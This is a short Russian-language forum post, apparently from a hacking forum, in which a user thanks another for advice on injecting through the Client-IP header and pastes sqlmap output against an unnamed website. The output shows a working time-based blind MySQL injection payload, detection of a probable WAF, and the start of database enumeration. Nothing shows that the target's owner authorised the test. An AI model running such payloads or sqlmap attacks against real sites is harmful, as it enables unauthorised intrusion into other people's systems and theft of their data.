Показать сообщение отдельно

  #6  
Старый 28.05.2018, 01:58
Sensoft
Постоянный
Регистрация: 14.06.2015
Сообщений: 396
Провел на форуме:
104689

Репутация: 1
По умолчанию

Цитата:
Сообщение от BabaDook  

возможно из за --headers='client-ip:*' отсутствие пробела . Возможно так надо было --headers='client-ip: *', вообще должно было. Но не суть, так или иначе всё робит. раскрутил же
Почти сдвиг есть в хорошую сторону

там кажись waf (

Ошибки есть пока что крутит BD

Код:
[00:41:56] [INFO] checking if the injection point on (custom) HEADER parameter 'Client-IP #1*' is a false positive
[00:42:26] [WARNING] there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests
(custom) HEADER parameter 'Client-IP #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 97 HTTP(s) requests:
---
Parameter: Client-IP #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: -1' OR 3 AND SLEEP(5)-- TZaC21=6 AND 000358=000358 or 'tPXGszqn'='
---
[00:43:36] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.12
[00:43:36] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries [00:43:36] [INFO] fetching current database
[00:43:36] [INFO] retrieved:
[00:43:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prev nt potential disruptions
[00:46:21] [ERROR] invalid character detected. retrying..
there seems to be a continuous problem with connection to the target. Are you sure that you want to continue with further
arget testing? [y/N]
спасибо тебе, чётко помог.
 
Ответить с цитированием